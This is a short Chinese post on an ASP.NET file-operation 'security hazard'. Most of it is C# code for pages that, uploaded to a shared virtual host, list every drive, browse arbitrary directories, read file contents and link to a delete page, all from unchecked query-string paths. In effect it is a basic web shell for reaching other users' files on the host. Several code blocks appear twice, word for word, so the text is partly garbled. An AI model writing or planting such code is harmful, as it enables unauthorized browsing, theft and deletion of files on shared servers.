ASP.NET的安全隐患—文件操作
.net的文件操作存在巨大的安全隐患,写了几个文件传到虚拟主机上,不但可以看到主机上的文件,甚至还可以进行删除等一系列的文件操作
得的驱动器目录
getit.aspx.cs
string[] drivers=Directory.GetLogicalDrives();
int NumOfDriver=drivers.Length;
for(int i=0;i<NumOfDriver;i++)
{
Response.Write("<a href=listdir.aspx?dir=" + Server.UrlEncode(drivers[i]) + ">" + drivers[i] + "</a><br>");
}
int NumOfDriver=drivers.Length;
for(int i=0;i<NumOfDriver;i++)
{
Response.Write("<a href=listdir.aspx?dir=" + Server.UrlEncode(drivers[i]) + ">" + drivers[i] + "</a><br>");
}
listdir.aspx.cs获得文件
string strDir=Request.QueryString.Get("dir");
try
{
DirectoryInfo theDir=new DirectoryInfo(strDir);
Response.Write(strDir + " 建立时间:" + theDir.CreationTime.ToString() + "<br>");
//获得子目录
DirectoryInfo[] subDir=theDir.GetDirectories();
Response.Write("文件夹");
for(int i=0;i<subDir.Length;i++)
{
Response.Write("<br><a href=listdir.aspx?dir=" + Server.UrlEncode(subDir[i].FullName) + ">" + subDir[i].FullName + "</a>");
}
Response.Write("<br>");
//获得文件
Response.Write("文件");
FileInfo[] theFiles=theDir.GetFiles();
for(int i=0;i<theFiles.Length;i++)
{
Response.Write("<br><a href=showfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">" +theFiles[i].FullName + "</a>");
Response.Write(" <a href=delfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">删除</a>");
}
}
catch(Exception ex)
{
Response.Write(ex.ToString());
}
try
{
DirectoryInfo theDir=new DirectoryInfo(strDir);
Response.Write(strDir + " 建立时间:" + theDir.CreationTime.ToString() + "<br>");
//获得子目录
DirectoryInfo[] subDir=theDir.GetDirectories();
Response.Write("文件夹");
for(int i=0;i<subDir.Length;i++)
{
Response.Write("<br><a href=listdir.aspx?dir=" + Server.UrlEncode(subDir[i].FullName) + ">" + subDir[i].FullName + "</a>");
}
Response.Write("<br>");
//获得文件
Response.Write("文件");
FileInfo[] theFiles=theDir.GetFiles();
for(int i=0;i<theFiles.Length;i++)
{
Response.Write("<br><a href=showfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">" +theFiles[i].FullName + "</a>");
Response.Write(" <a href=delfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">删除</a>");
}
}
catch(Exception ex)
{
Response.Write(ex.ToString());
}
showfile.aspx.cs读取文件信息
string strFile=Request.QueryString.Get("file");
FileInfo file=new FileInfo(strFile);
Response.Write("<br>");
Response.Write("<br>名称:" + file.Name);
Response.Write("<br>路径:" + file.FullName);
Response.Write("<br>当前目录:" + file.Directory);
Response.Write("<br>建立时间:" + file.CreationTime.ToString());
Response.Write("<br>大小:" + file.Length.ToString() + "Bytes");
Response.Write("<br>上次访问时间:" + file.LastAccessTime.ToString());
Response.Write("<br>上次修改时间:" + file.LastWriteTime.ToString());
Response.Write("<br>");
Response.Write("Open with text(读取一定数量字符)" + "<br>");
StreamReader reader=file.OpenText();
char[] buffer=new char[255];
int nRead=reader.ReadBlock(buffer,0,255);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(new String(buffer,0,nRead)));
Response.Write("</pre>");
FileInfo file=new FileInfo(strFile);
Response.Write("<br>");
Response.Write("<br>名称:" + file.Name);
Response.Write("<br>路径:" + file.FullName);
Response.Write("<br>当前目录:" + file.Directory);
Response.Write("<br>建立时间:" + file.CreationTime.ToString());
Response.Write("<br>大小:" + file.Length.ToString() + "Bytes");
Response.Write("<br>上次访问时间:" + file.LastAccessTime.ToString());
Response.Write("<br>上次修改时间:" + file.LastWriteTime.ToString());
Response.Write("<br>");
Response.Write("Open with text(读取一定数量字符)" + "<br>");
StreamReader reader=file.OpenText();
char[] buffer=new char[255];
int nRead=reader.ReadBlock(buffer,0,255);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(new String(buffer,0,nRead)));
Response.Write("</pre>");